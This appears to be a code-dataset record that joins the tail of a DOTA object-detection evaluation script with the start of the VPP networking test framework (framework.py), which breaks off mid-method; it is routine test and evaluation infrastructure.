test_imgname_list = [os.path.join(args.test_dir, img_name) for img_name in os.listdir(args.test_dir)
if img_name.endswith(('.jpg', '.png', '.jpeg', '.tif', '.tiff'))]
assert len(test_imgname_list) != 0, 'test_dir has no imgs there.' \
' Note that, we only support img format of (.jpg, .png, and .tiff) '
if num_imgs == np.inf:
real_test_img_list = test_imgname_list
else:
real_test_img_list = test_imgname_list[: num_imgs]
retinanet = build_whole_network_r3det.DetectionNetwork(base_network_name=cfgs.NET_NAME,
is_training=False)
test_dota(det_net=retinanet, real_test_img_list=real_test_img_list, args=args, txt_name=txt_name)
if not args.show_box:
os.remove(txt_name)
def parse_args():
parser = argparse.ArgumentParser('evaluate the result.')
parser.add_argument('--test_dir', dest='test_dir',
help='evaluate imgs dir ',
default='/data/dataset/DOTA/test/images/', type=str)
parser.add_argument('--gpus', dest='gpus',
help='gpu id',
default='0,1,2,3,4,5,6,7', type=str)
parser.add_argument('--eval_num', dest='eval_num',
help='the num of eval imgs',
default=np.inf, type=int)
parser.add_argument('--show_box', '-s', default=False,
action='store_true')
parser.add_argument('--h_len', dest='h_len',
help='image height',
default=600, type=int)
parser.add_argument('--w_len', dest='w_len',
help='image width',
default=600, type=int)
parser.add_argument('--h_overlap', dest='h_overlap',
help='height overlap',
default=150, type=int)
parser.add_argument('--w_overlap', dest='w_overlap',
help='width overlap',
default=150, type=int)
args = parser.parse_args()
return args
if __name__ == '__main__':
args = parse_args()
print(20*"--")
print(args)
print(20*"--")
eval(args.eval_num,
args=args)
|
framework.py
|
#!/usr/bin/env python3
from __future__ import print_function
import gc
import logging
import sys
import os
import select
import signal
import subprocess
import unittest
import tempfile
import time
import faulthandler
import random
import copy
import psutil
import platform
from collections import deque
from threading import Thread, Event
from inspect import getdoc, isclass
from traceback import format_exception
from logging import FileHandler, DEBUG, Formatter
from enum import Enum
from abc import ABC, abstractmethod
import scapy.compat
from scapy.packet import Raw
import hook as hookmodule
from vpp_pg_interface import VppPGInterface
from vpp_sub_interface import VppSubInterface
from vpp_lo_interface import VppLoInterface
from vpp_bvi_interface import VppBviInterface
from vpp_papi_provider import VppPapiProvider
from vpp_papi import VppEnum
import vpp_papi
from vpp_papi.vpp_stats import VPPStats
from vpp_papi.vpp_transport_socket import VppTransportSocketIOError
from log import RED, GREEN, YELLOW, double_line_delim, single_line_delim, \
get_logger, colorize
from vpp_object import VppObjectRegistry
from util import ppp, is_core_present
from scapy.layers.inet import IPerror, TCPerror, UDPerror, ICMPerror
from scapy.layers.inet6 import ICMPv6DestUnreach, ICMPv6EchoRequest
from scapy.layers.inet6 import ICMPv6EchoReply
from cpu_config import available_cpus, num_cpus, max_vpp_cpus
logger = logging.getLogger(__name__)
# Set up an empty logger for the testcase that can be overridden as necessary
null_logger = logging.getLogger('VppTestCase')
null_logger.addHandler(logging.NullHandler())
PASS = 0
FAIL = 1
ERROR = 2
SKIP = 3
TEST_RUN = 4
SKIP_CPU_SHORTAGE = 5
class BoolEnvironmentVariable(object):
def __init__(self, env_var_name, default='n', true_values=None):
self.name = env_var_name
self.default = default
self.true_values = true_values if true_values is not None else \
("y", "yes", "1")
def __bool__(self):
return os.getenv(self.name, self.default).lower() in self.true_values
if sys.version_info[0] == 2:
__nonzero__ = __bool__
def __repr__(self):
return 'BoolEnvironmentVariable(%r, default=%r, true_values=%r)' % \
(self.name, self.default, self.true_values)
debug_framework = BoolEnvironmentVariable('TEST_DEBUG')
if debug_framework:
import debug_internal
"""
Test framework module.
The module provides a set of tools for constructing and running tests and
representing the results.
"""
class VppDiedError(Exception):
""" exception for reporting that the subprocess has died."""
signals_by_value = {v: k for k, v in signal.__dict__.items() if
k.startswith('SIG') and not k.startswith('SIG_')}
def __init__(self, rv=None, testcase=None, method_name=None):
self.rv = rv
self.signal_name = None
self.testcase = testcase
self.method_name = method_name
try:
self.signal_name = VppDiedError.signals_by_value[-rv]
except (KeyError, TypeError):
pass
if testcase is None and method_name is None:
in_msg = ''
else:
in_msg = ' while running %s.%s' % (testcase, method_name)
if self.rv:
msg = "VPP subprocess died unexpectedly%s with return code: %d%s."\
% (in_msg, self.rv, ' [%s]' %
(self.signal_name if
self.signal_name is not None else ''))
else:
msg = "VPP subprocess died unexpectedly%s." % in_msg
super(VppDiedError, self).__init__(msg)
class _PacketInfo(object):
"""Private class to create packet info object.
Help process information about the next packet.
Set variables to default values.
"""
#: Store the index of the packet.
index = -1
#: Store the index of the source packet generator interface of the packet.
src = -1
#: Store the index of the destination packet generator interface
#: of the packet.
dst = -1
#: Store expected ip version
ip = -1
#: Store expected upper protocol
proto = -1
#: Store the copy of the former packet.
data = None
def __eq__(self, other):
index = self.index == other.index
src = self.src == other.src
dst = self.dst == other.dst
data = self.data == other.data
return index and src and dst and data
def pump_output(testclass):
""" pump output from vpp stdout/stderr to proper queues """
stdout_fragment = ""
stderr_fragment = ""
while not testclass.pump_thread_stop_flag.is_set():
readable = select.select([testclass.vpp.stdout.fileno(),
testclass.vpp.stderr.fileno(),
testclass.pump_thread_wakeup_pipe[0]],
[], [])[0]
if testclass.vpp.stdout.fileno() in readable:
read = os.read(testclass.vpp.stdout.fileno(), 102400)
if len(read) > 0:
split = read.decode('ascii',
errors='backslashreplace').splitlines(True)
if len(stdout_fragment) > 0:
split[0] = "%s%s" % (stdout_fragment, split[0])
if len(split) > 0 and split[-1].endswith("\n"):
limit = None
else:
limit = -1
stdout_fragment = split[-1]
testclass.vpp_stdout_deque.extend(split[:limit])
if not testclass.cache_vpp_output:
for line in split[:limit]:
testclass.logger.info(
"VPP STDOUT: %s" % line.rstrip("\n"))
if testclass.vpp.stderr.fileno() in readable:
read = os.read(testclass.vpp.stderr.fileno(), 102400)
if len(read) > 0:
split = read.decode('ascii',
errors='backslashreplace').splitlines(True)
if len(stderr_fragment) > 0:
split[0] = "%s%s" % (stderr_fragment, split[0])
if len(split) > 0 and split[-1].endswith("\n"):
limit = None
else:
limit = -1
stderr_fragment = split[-1]
testclass.vpp_stderr_deque.extend(split[:limit])
if not testclass.cache_vpp_output:
for line in split[:limit]:
testclass.logger.error(
"VPP STDERR: %s" % line.rstrip("\n"))
# ignoring the dummy pipe here intentionally - the
# flag will take care of properly terminating the loop
def _is_skip_aarch64_set():
return BoolEnvironmentVariable('SKIP_AARCH64')
is_skip_aarch64_set = _is_skip_aarch64_set()
def _is_platform_aarch64():
return platform.machine() == 'aarch64'
is_platform_aarch64 = _is_platform_aarch64()
def _running_extended_tests():
return BoolEnvironmentVariable("EXTENDED_TESTS")
running_extended_tests = _running_extended_tests()
def _running_gcov_tests():
return BoolEnvironmentVariable("GCOV_TESTS")
running_gcov_tests = _running_gcov_tests()
def get_environ_vpp_worker_count():
worker_config = os.getenv("VPP_WORKER_CONFIG", None)
if worker_config:
elems = worker_config.split(" ")
if elems[0] != "workers" or len(elems) != 2:
raise ValueError("Wrong VPP_WORKER_CONFIG == '%s' value." %
worker_config)
return int(elems[1])
else:
return 0
environ_vpp_worker_count = get_environ_vpp_worker_count()
class KeepAliveReporter(object):
"""
Singleton object which reports test start to parent process
"""
_shared_state = {}
def __init__(self):
self.__dict__ = self._shared_state
self._pipe = None
@property
def pipe(self):
return self._pipe
@pipe.setter
def pipe(self, pipe):
if self._pipe is not None:
raise Exception("Internal error - pipe should only be set once.")
self._pipe = pipe
def send_keep_alive(self, test, desc=None):
"""
Write current test tmpdir & desc to keep-alive pipe to signal liveness
"""
if self.pipe is None:
# if not running forked..
return
if isclass(test):
desc = '%s (%s)' % (desc, unittest.util.strclass(test))
else:
desc = test.id()
self.pipe.send((desc, test.vpp_bin, test.tempdir, test.vpp.pid))
class TestCaseTag(Enum):
# marks the suites that must run at the end
# using only a single test runner
RUN_SOLO = 1
# marks the suites broken on VPP multi-worker
FIXME_VPP_WORKERS = 2
def create_tag_decorator(e):
def decorator(cls):
try:
cls.test_tags.append(e)
except AttributeError:
cls.test_tags = [e]
return cls
return decorator
tag_run_solo = create_tag_decorator(TestCaseTag.RUN_SOLO)
tag_fixme_vpp_workers = create_tag_decorator(TestCaseTag.FIXME_VPP_WORKERS)
class DummyVpp:
returncode = None
pid = 0xcafebafe
def poll(self):
pass
def terminate(self):
pass
class CPUInterface(ABC):
cpus = []
skipped_due_to_cpu_lack = False
@classmethod
@abstractmethod
def get_cpus_required(cls):
pass
@classmethod
def assign_cpus(cls, cpus):
cls.cpus = cpus
class VppTestCase(CPUInterface, unittest.TestCase):
"""This subclass is a base class for VPP test cases that are implemented as
classes. It provides methods to create and run test case.
"""
extra_vpp_statseg_config = ""
extra_vpp_punt_config = []
extra_vpp_plugin_config = []
logger = null_logger
vapi_response_timeout = 5
@property
def packet_infos(self):
"""List of packet infos"""
return self._packet_infos
@classmethod
def get_packet_count_for_if_idx(cls, dst_if_index):
"""Get the number of packet info for specified destination if index"""
if dst_if_index in cls._packet_count_for_dst_if_idx:
return cls._packet_count_for_dst_if_idx[dst_if_index]
else:
return 0
@classmethod
def has_tag(cls, tag):
""" if the test case has a given tag - return true """
try:
return tag in cls.test_tags
except AttributeError:
pass
return False
@classmethod
def is_tagged_run_solo(cls):
""" if the test case class is timing-sensitive - return true """
return cls.has_tag(TestCaseTag.RUN_SOLO)
@classmethod
def instance(cls):
"""Return the instance of this testcase"""
return cls.test_instance
@classmethod
def set_debug_flags(cls, d):
cls.gdbserver_port = 7777
cls.debug_core = False
cls.debug_gdb = False
cls.debug_gdbserver = False
cls.debug_all = False
cls.debug_attach = False
if d is None:
return
dl = d.lower()
if dl == "core":
cls.debug_core = True
elif dl == "gdb" or dl == "gdb-all":
cls.debug_gdb = True
elif dl == "gdbserver" or dl == "gdbserver-all":
cls.debug_gdbserver = True
elif dl == "attach":
cls.debug_attach = True
else:
raise Exception("Unrecognized DEBUG option: '%s'" % d)
if dl == "gdb-all" or dl == "gdbserver-all":
cls.debug_all = True
@classmethod
def get_vpp_worker_count(cls):
if not hasattr(cls, "vpp_worker_count"):
if cls.has_tag(TestCaseTag.FIXME_VPP_WORKERS):
cls.vpp_worker_count = 0
else:
cls.vpp_worker_count = environ_vpp_worker_count
return cls.vpp_worker_count
@classmethod
def get_cpus_required(cls):
return 1 + cls.get_vpp_worker_count()
@classmethod
def setUpConstants(cls):
""" Set-up the test case class based on environment variables """
cls.step = BoolEnvironmentVariable('STEP')
# inverted case to handle '' == True
c = os.getenv("CACHE_OUTPUT", "1")
cls.cache_vpp_output = False if c.lower() in ("n", "no", "0") else True
cls.vpp_bin = os.getenv('VPP_BIN', "vpp")
cls.plugin_path = os.getenv('VPP_PLUGIN_PATH')
cls.test_plugin_path = os.getenv('VPP_TEST_PLUGIN_PATH')
cls.extern_plugin_path = os.getenv('EXTERN_PLUGINS')
plugin_path = None
if cls.plugin_path is not None:
if cls.extern_plugin_path is not None:
plugin_path = "%s:%s" % (
cls.plugin_path, cls.extern_plugin_path)
else:
plugin_path = cls.plugin_path
elif cls.extern_plugin_path is not None:
plugin_path = cls.extern_plugin_path
debug_cli = ""
if cls.step or cls.debug_gdb or cls.debug_gdbserver:
debug_cli = "cli-listen localhost:5002"
coredump_size = None
size = os.getenv("COREDUMP_SIZE")
if size is not None:
coredump_size = "coredump-size %s" % size
if coredump_size is None:
coredump_size = "coredump-size unlimited"
default_variant = os.getenv("VARIANT")
if default_variant is not None:
default_variant = "defaults { %s 100 }" % default_variant
else:
default_variant = ""
api_fuzzing = os.getenv("API_FUZZ")
if api_fuzzing is None:
api_fuzzing = 'off'
cls.vpp_cmdline = [
cls.vpp_bin,
"unix", "{", "nodaemon", debug_cli, "full-coredump",
coredump_size, "runtime-dir", cls.tempdir, "}",
"api-trace", "{", "on", "}",
"api-segment", "{", "prefix", cls.get_api_segment_prefix(), "}",
"cpu", "{", "main-core", str(cls.cpus[0]), ]
if cls.get_vpp_worker_count():
cls.vpp_cmdline.extend([
"corelist-workers", ",".join([str(x) for x in cls.cpus[1:]])])
cls.vpp_cmdline.extend([
"}",
"physmem", "{", "max-size", "32m", "}",
"statseg", "{", "socket-name", cls.get_stats_sock_path(),
cls.extra_vpp_statseg_config, "}",
"socksvr", "{", "socket-name", cls.get_api_sock_path(), "}",
"node { ", default_variant, "}",
"api-fuzz {", api_fuzzing, "}",
"plugins", "{", "plugin", "dpdk_plugin.so", "{", "disable", "}",
"plugin", "rdma_plugin.so", "{", "disable", "}",
"plugin", "lisp_unittest_plugin.so", "{", "enable", "}",
"plugin", "unittest_plugin.so", "{", "enable", "}"
] + cls.extra_vpp_plugin_config + ["}", ])
if cls.extra_vpp_punt_config is not None:
cls.vpp_cmdline.extend(cls.extra_vpp_punt_config)
if plugin_path is not None:
cls.vpp_cmdline.extend(["plugin_path", plugin_path])
if cls.test_plugin_path is not None:
cls.vpp_cmdline.extend(["test_plugin_path", cls.test_plugin_path])
if not cls.debug_attach:
cls.logger.info("vpp_cmdline args: %s" % cls.vpp_cmdline)
cls.logger.info("vpp_cmdline: %s" % " ".join(cls.vpp_cmdline))
@classmethod
def wait_for_enter(cls):
if cls.debug_gdbserver:
print(double_line_delim)
print("Spawned GDB server with PID: %d" % cls.vpp.pid)
elif cls.debug_gdb:
print(double_line_delim)
print("Spawned VPP with PID: %d" % cls.vpp.pid)
else:
cls.logger.debug("Spawned VPP with PID: %d" % cls.vpp.pid)
return
print(single_line_delim)
print("You can debug VPP using:")
if cls.debug_gdbserver:
print("sudo gdb " + cls.vpp_bin +
" -ex 'target remote localhost:{port}'"
.format(port=cls.gdbserver_port))
print("Now is the time to attach gdb by running the above "
"command, set up breakpoints etc., then resume VPP from "
"within gdb by issuing the 'continue' command")
cls.gdbserver_port += 1
elif cls.debug_gdb:
print("sudo gdb " + cls.vpp_bin + " -ex 'attach %s'" % cls.vpp.pid)
print("Now is the time to attach gdb by running the above "
"command and set up breakpoints etc., then resume VPP from"
" within gdb by issuing the 'continue' command")
print(single_line_delim)
input("Press ENTER to continue running the testcase...")
@classmethod
def attach_vpp(cls):
cls.vpp = DummyVpp()
@classmethod
def run_vpp(cls):
cls.logger.debug(f"Assigned cpus: {cls.cpus}")
cmdline = cls.vpp_cmdline
if cls.debug_gdbserver:
gdbserver = '/usr/bin/gdbserver'
if not os.path.isfile(gdbserver) or\
not os.access(gdbserver, os.X_OK):
raise Exception("gdbserver binary '%s' does not exist or is "
"not executable" % gdbserver)
cmdline = [gdbserver, 'localhost:{port}'
.format(port=cls.gdbserver_port)] + cls.vpp_cmdline
cls.logger.info("Gdbserver cmdline is %s", " ".join(cmdline))
try:
cls.vpp = subprocess.Popen(cmdline,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
except subprocess.CalledProcessError as e:
cls.logger.critical("Subprocess returned with non-0 return code: ("
"%s)", e.returncode)
raise
except OSError as e:
cls.logger.critical("Subprocess returned with OS error: "
"(%s) %s", e.errno, e.strerror)
raise
except Exception as e:
cls.logger.exception("Subprocess returned unexpected from "
"%s:", cmdline)
raise
cls.wait_for_enter()
@classmethod
def wait_for_coredump(cls):
corefile = cls.tempdir + "/core"
if os.path.isfile(corefile):
cls.logger.error("Waiting for coredump to complete: %s", corefile)
curr_size = os.path.getsize(corefile)
deadline = time.time() + 60
ok = False
while time.time() < deadline:
cls.sleep(1)
size = curr_size
curr_size = os.path.getsize(corefile)
if size == curr_size:
ok = True
break
if not ok:
cls.logger.error("Timed out waiting for coredump to complete:"
" %s", corefile)
else:
cls.logger.error("Coredump complete: %s, size %d",
corefile, curr_size)
@classmethod
def get_stats_sock_path(cls):
return "%s/stats.sock" % cls.tempdir
@classmethod
def get_api_sock_path(cls):
return "%s/api.sock" % cls.tempdir
@classmethod
def get_api_segment_prefix(cls):
return os.path.basename(cls.tempdir) # Only used for VAPI
@classmethod
def get_tempdir(cls):
if cls.debug_attach:
return os.getenv("VPP_IN_GDB_TMP_DIR",
"/tmp/unittest-attach-gdb")
else:
return tempfile.mkdtemp(prefix='vpp-unittest-%s-' % cls.__name__)
@classmethod
def setUpClass(cls):
"""
Perform class setup before running the testcase
Remove shared memory files, start vpp and connect the vpp-api
"""
super(VppTestCase, cls).setUpClass()
cls.logger = get_logger(cls.__name__)
seed = os.environ["RND_SEED"]
random.seed(seed)
if hasattr(cls, 'parallel_handler'):
cls.logger.addHandler(cls.parallel_handler)
cls.logger.propagate = False
d = os.getenv("DEBUG", None)
cls.set_debug_flags(d)
cls.tempdir = cls.get_tempdir()
cls.file_handler = FileHandler("%s/log.txt" % cls.tempdir)
cls.file_handler.setFormatter(
Formatter(fmt='%(asctime)s,%(msecs)03d %(message)s',
datefmt="%H:%M:%S"))
cls.file_handler.setLevel(DEBUG)
cls.logger.addHandler(cls.file_handler)
cls.logger.debug("--- setUpClass() for %s called ---" % cls.__name__)
os.chdir(cls.tempdir)
cls.logger.info("Temporary dir is %s, api socket is %s",
cls.tempdir, cls.get_api_sock_path())
cls.logger.debug("Random seed is %s", seed)
cls.setUpConstants()
cls.reset_packet_infos()
cls._pcaps = []
cls._old_pcaps = []
cls.verbose = 0
cls.vpp_dead = False
cls.registry = VppObjectRegistry()
cls.vpp_startup_failed = False
cls.reporter = KeepAliveReporter()
# need to catch exceptions here because if we raise, then the cleanup
# doesn't get called and we might end with a zombie vpp
try:
if cls.debug_attach:
cls.attach_vpp()
else:
cls.run_vpp()
cls.reporter.send_keep_alive(cls, 'setUpClass')
VppTestResult.current_test_case_info = TestCaseInfo(
cls.logger, cls.tempdir, cls.vpp.pid, cls.vpp_bin)
cls.vpp_stdout_deque = deque()
cls.vpp_stderr_deque = deque()
if not cls.debug_attach:
cls.pump_thread_stop_flag = Event()
cls.pump_thread_wakeup_pipe = os.pipe()
cls.pump_thread = Thread(target=pump_output, args=(cls,))
cls.pump_thread.daemon = True
cls.pump_thread.start()
if cls.debug_gdb or cls.debug_gdbserver or cls.debug_attach:
cls.vapi_response_timeout = 0
cls.vapi = VppPapiProvider(cls.__name__, cls,
cls.vapi_response_timeout)
if cls.step:
hook = hookmodule.StepHook(cls)
else:
hook = hookmodule.PollHook(cls)
cls.vapi.register_hook(hook)
cls.statistics = VPPStats(socketname=cls.get_stats_sock_path())
try:
hook.poll_vpp()
except VppDiedError:
cls.vpp_startup_failed = True
cls.logger.critical(
"VPP died shortly after startup, check the"
" output to standard error for possible cause")
raise
try:
cls.vapi.connect()
except (vpp_papi.VPPIOError, Exception) as e:
cls.logger.debug("Exception connecting to vapi: %s" % e)
cls.vapi.disconnect()
if cls.debug_gdbserver:
print(colorize("You're running VPP inside gdbserver but "
"VPP-API connection failed, did you forget "
"to 'continue' VPP from within gdb?", RED))
raise e
if cls.debug_attach:
last_line = cls.vapi.cli("show thread").split("\n")[-2]
cls.vpp_worker_count = int(last_line.split(" ")[0])
print("Detected VPP with %s workers." % cls.vpp_worker_count)
except vpp_papi.VPPRuntimeError as e:
cls.logger.debug("%s" % e)
cls.quit()
raise e
except Exception as e:
cls.logger.debug("Exception connecting to VPP: %s" % e)
cls.quit()
raise e
@classmethod
def _debug_quit(cls):
if (cls.debug_gdbserver or cls.debug_gdb):
try:
cls.vpp.poll()
if cls.vpp.returncode is None:
print()
print(double_line_delim)
print("VPP or GDB server is still running")
print(single_line_delim)
input("When done debugging, press ENTER to kill the "
"process and finish running the testcase...")
except AttributeError:
pass
@classmethod
def quit(cls):
"""
Disconnect vpp-api, kill vpp and cleanup shared memory files
"""
cls._debug_quit()
# first signal that we want to stop the pump thread, then wake it up
if hasattr(cls, 'pump_thread_stop_flag'):
cls.pump_thread_stop_flag.set()
if hasattr(cls, 'pump_thread_wakeup_pipe'):
os.write(cls.pump_thread_wakeup_pipe[1], b'ding dong wake up')
if hasattr(cls, 'pump_thread'):
cls.logger.debug("Waiting for pump thread to stop")
cls.pump_thread.join()
if hasattr(cls, 'vpp_stderr_reader_thread'):
cls.logger.debug("Waiting for stderr pump to stop")
cls.vpp_stderr_reader_thread.join()
if hasattr(cls, 'vpp'):
if hasattr(cls, 'vapi'):
cls.logger.debug(cls.vapi.vpp.get_stats())
cls.logger.debug("Disconnecting class vapi client on %s",
cls.__name__)
cls.vapi.disconnect()
cls.logger.debug("Deleting class vapi attribute on %s",
cls.__name__)
del cls.vapi
cls.vpp.poll()
if not cls.debug_attach and cls.vpp.returncode is None:
cls.wait_for_coredump()
cls.logger.debug("Sending TERM to vpp")
cls.vpp.terminate()
cls.logger.debug("Waiting for vpp to die")
try:
outs, errs = cls.vpp.communicate(timeout=5)
except subprocess.TimeoutExpired:
cls.vpp.kill()
outs, errs = cls.vpp.communicate()
cls.logger.debug("Deleting class vpp attribute on %s",
cls.__name__)
if not cls.debug_attach:
cls.vpp.stdout.close()
cls.vpp.stderr.close()
del cls.vpp
if cls.vpp_startup_failed:
stdout_log = cls.logger.info
stderr_log = cls.logger.critical
else:
stdout_log = cls.logger.info
stderr_log = cls.logger.info
if hasattr(cls, 'vpp_stdout_deque'):
stdout_log(single_line_delim)
stdout_log('VPP output to stdout while running %s:', cls.__name__)
stdout_log(single_line_delim)
vpp_output = "".join(cls.vpp_stdout_deque)
with open(cls.tempdir + '/vpp_stdout.txt', 'w') as f:
f.write(vpp_output)
stdout_log('\n%s', vpp_output)
stdout_log(single_line_delim)
if hasattr(cls, 'vpp_stderr_deque'):
stderr_log(single_line_delim)
stderr_log('VPP output to stderr while running %s:', cls.__name__)
stderr_log(single_line_delim)
vpp_output = "".join(cls.vpp_stderr_deque)
with open(cls.tempdir + '/vpp_stderr.txt', 'w') as f:
f.write(vpp_output)
stderr_log('\n%s', vpp_output)
stderr_log(single_line_delim)
@classmethod
def tearDownClass(cls):
""" Perform final cleanup after running all tests in this test-case """
cls.logger.debug("--- tearDownClass() for %s called ---" %
cls.__name__)
cls.reporter.send_keep_alive(cls, 'tearDownClass')
cls.quit()
cls.file_handler.close()
cls.reset_packet_infos()
if debug_framework:
debug_internal.on_tear_down_class(cls)
def show_commands_at_teardown(self):
""" Allow subclass specific teardown logging additions."""
self.logger.info("--- No test specific show commands provided. ---")
def tearDown(self):
""" Show various debug prints after each test """
self.logger.debug("--- tearDown() for %s.%s(%s) called ---" %
(self.__class__.__name__, self._testMethodName,
self._testMethodDoc))
try:
if not self.vpp_dead:
self.logger.debug(self.vapi.cli("show trace max 1000"))
self.logger.info(self.vapi.ppcli("show interface"))
self.logger.info(self.vapi.ppcli("show hardware"))
self.logger.info(self.statistics.set_errors_str())
self.logger.info(self.vapi.ppcli("show run"))
self.logger.info(self.vapi.ppcli("show log"))
self.logger.info(self.vapi.ppcli("show bihash"))
self.logger.info("Logging testcase specific show commands.")
self.show_commands_at_teardown()
self.registry.remove_vpp_config(self.logger)
# Save/Dump VPP api trace log
m = self._testMethodName
api_trace = "vpp_api_trace.%s.%d.log" % (m, self.vpp.pid)
tmp_api_trace = "/tmp/%s" % api_trace
vpp_api_trace_log = "%s/%s" % (self.tempdir, api_trace)
self.logger.info(self.vapi.ppcli("api trace save %s" % api_trace))
self.logger.info("Moving %s to %s\n" % (tmp_api_trace,
vpp_api_trace_log))
os.rename(tmp_api_trace, vpp_api_trace_log)
except VppTransportSocketIOError:
self.logger.debug("VppTransportSocketIOError: Vpp dead. "
"Cannot log show commands.")
self.vpp_dead = True
else:
self.registry.unregister_all(self.logger)
def setUp(self):
""" Clear trace before running each test"""
super(VppTestCase, self).setUp()
self.reporter.send_keep_alive(self)
if self.vpp_dead:
raise VppDiedError(rv=None, testcase=self.__class__.__name__,
method_name=self._testMethodName)
self.sleep(.1, "during setUp")
self.vpp_stdout_deque.append(
"--- test setUp() for %s.%s(%s) starts here ---\n" %
(self.__class__.__name__, self._testMethodName,
self._testMethodDoc))
self.vpp_stderr_deque.append(
"--- test setUp() for %s.%s(%s) starts here ---\n" %
(self.__class__.__name__, self._testMethodName,
self._testMethodDoc))
self.vapi.cli("clear trace")
# store the test instance inside the test class - so that objects
# holding the class can access instance methods (like assertEqual)
type(self).test_instance = self
@classmethod
def pg_enable_capture(cls, interfaces=None):
"""
Enable capture on packet-generator interfaces
:param interfaces: iterable interface indexes (if None,
use self.pg_interfaces)
"""
if interfaces is None:
interfaces = cls.pg_interfaces
for i in interfaces:
i.enable_capture()
@classmethod
def register_pcap(cls, intf, worker):
""" Register a pcap in the testclass """
# add to the list of captures with current timestamp
cls._pcaps.append((intf, worker))
@classmethod
def get_vpp_time(cls):
# processes e.g. "Time now 2.190522, Wed, 11 Mar 2020 17:29:54 GMT"
# returns float("2.190522")
timestr = cls.vapi.cli('show clock')
head, sep, tail = timestr.partition(',')
head, sep, tail = head.partition('Time now')
return float(tail)
@classmethod
def sleep_on_vpp_time(cls, sec):
""" Sleep according to time in VPP world """
# On a busy system with many processes
# we might end up with VPP time being slower than real world
# So take that into account when waiting for VPP to do something
start_time = cls.get_vpp_time()
while cls.get_vpp_time() - start_time < sec:
cls.sleep(0.1)
@classmethod
def pg_start(cls, trace=True):
""" Enable the PG, wait till it is done, then clean up """
for (intf, worker) in cls._old_pcaps:
intf.rename_old_pcap_file(intf.get_in_path(worker),
intf.in_history_counter)
cls._old_pcaps = []
if trace:
cls.vapi.cli("clear trace")
cls.vapi.cli("trace add pg-input 1000")
cls.vapi.cli('packet-generator enable')
# PG, when starts, runs to completion -
# so let's avoid a race condition,
# and wait a little till it's done.
# Then clean it up - and then be gone.
deadline = time.time() + 300
while cls.vapi.cli('show packet-generator').find("Yes") != -1:
cls.sleep(0.01) # yield
if time.time() > deadline:
cls.logger.error("Timeout waiting for pg to stop")
break
for intf, worker in cls._pcaps:
cls.vapi.cli('packet-generator delete %s' %
intf.get_cap_name(worker))
cls._old_pcaps = cls._pcaps
cls._pcaps = []
@classmethod
def create_pg_interfaces_internal(cls, interfaces, gso=0, gso_size=0,
mode=None):
"""
Create packet-generator interfaces.
:param interfaces: iterable indexes of the interfaces.
:returns: List of created interfaces.
"""
result = []
for i in interfaces:
intf = VppPGInterface(cls, i, gso, gso_size, mode)
setattr(cls, intf.name, intf)
result.append(intf)
cls.pg_interfaces = result
return result
@classmethod
def create_pg_ip4_interfaces(cls, interfaces, gso=0, gso_size=0):
pgmode = VppEnum.vl_api_pg_interface_mode_t
return cls.create_pg_interfaces_internal(interfaces, gso, gso_size,
pgmode.PG_API_MODE_IP4)
@classmethod
def create_pg_ip6_interfaces(cls, interfaces, gso=0, gso_size=0):
pgmode = VppEnum.vl_api_pg_interface_mode_t
return cls.create_pg_interfaces_internal(interfaces, gso, gso_size,
pgmode.PG_API_MODE_IP6)
@classmethod
def create_pg_interfaces(cls, interfaces, gso=0, gso_size=0):
pgmode = VppEnum.vl_api_pg_interface_mode_t
return cls.create_pg_interfaces_internal(interfaces, gso, gso_size,
pgmode.PG_API_MODE_ETHERNET)
@classmethod
def create_pg_ethernet_interfaces(cls, interfaces, gso=0, gso_size=0):
pgmode = VppEnum.vl_api_pg_interface_mode_t
return cls.create_pg_interfaces_internal(interfaces, gso, gso_size,
pgmode.PG_API_MODE_ETHERNET)
@classmethod
def create_loopback_interfaces(cls, count):
"""
Create loopback interfaces.
:param count: number of interfaces created.
:returns: List of created interfaces.
"""
result = [VppLoInterface(cls) for i in range(count)]
for intf in result:
setattr(cls, intf.name, intf)
cls.lo_interfaces = result
return result
@classmethod
def create_bvi_interfaces(cls, count):
"""
Create BVI interfaces.
:param count: number of interfaces created.
:returns: List of created interfaces.
"""
result = [VppBviInterface(cls) for i in range(count)]
for intf in result:
setattr(cls, intf.name, intf)
cls.bvi_interfaces = result
return result
@staticmethod
def extend_packet(packet, size, padding=' '):
"""
Extend packet to given size by padding with spaces or custom padding
NOTE: Currently works only when Raw layer is present.
:param packet: packet
:param size: target size
:param padding: padding used to extend the payload
"""
packet_len = len(packet) + 4
extend = size - packet_len
if extend > 0:
num = (extend // len(padding)) + 1
packet[Raw].load += (padding * num)[:extend].encode("ascii")
@classmethod
def reset_packet_infos(cls):
""" Reset the list of packet info objects and packet counts to zero """
cls._packet_infos = {}
cls._packet_count_for_dst_if_idx = {}
@classmethod
def create_packet_info(cls, src_if, dst_if):
"""
Create packet info object containing the source and destination indexes
and add it to the testcase's packet info list
:param VppInterface src_if: source interface
:param VppInterface dst_if: destination interface
:returns: _PacketInfo object
"""
info = _PacketInfo()
info.index = len(cls._packet_infos)
info.src = src_if.sw_if_index
info.dst = dst_if.sw_if_index
if isinstance(dst_if, VppSubInterface):
dst_idx = dst_if.parent.sw_if_index
else:
dst_idx = dst_if.sw_if_index
if dst_idx in cls._packet_count_for_dst_if_idx:
cls._packet_count_for_dst_if_idx[dst_idx] += 1
else:
cls._packet_count_for_dst_if_idx[dst_idx] = 1
cls._packet_infos[info.index] = info
return info
@staticmethod
def info_to_payload(info):
"""
Convert _PacketInfo object to packet payload
:param info: _PacketInfo object
:returns: string containing serialized data from packet info
"""
return "%d %d %d %d %d" % (info.index, info.src, info.dst,
info.ip, info.proto)
@staticmethod
def payload_to_info(payload, payload_field='load'):
"""
Convert packet payload to _PacketInfo object
:param payload: packet payload
:type payload: <class 'scapy.packet.Raw'>
:param payload_field: packet fieldname of payload "load" for
<class 'scapy.packet.Raw'>
:type payload_field: str
:returns: _PacketInfo object containing de-serialized data from payload
"""
numbers = getattr(payload, payload_field).split()
info = _PacketInfo()
info.index = int(numbers[0])
info.src = int(numbers[1])
info.dst = int(numbers[2])
info.ip = int(numbers[3])
info.proto = int(numbers[4])
return info
def get_next_packet_info(self, info):
"""
Iterate over the packet info list stored in the testcase
Start iteration with first element if info is None
Continue based on index in info if info is specified
:param info: info or None
:returns: next info in list or None if no more infos
"""
if info is None:
next_index = 0
else:
next_index = info.index + 1
if next_index == len(self._packet_infos):
return None
else:
return self._packet_infos[next_index]
def get_next_packet_info_for_interface(self, src_index, info):
"""
Search the packet info list for the next packet info with same source
interface index
:param src_index: source interface index to search for
:param info: packet info - where to start the search
:returns: packet info or None
"""
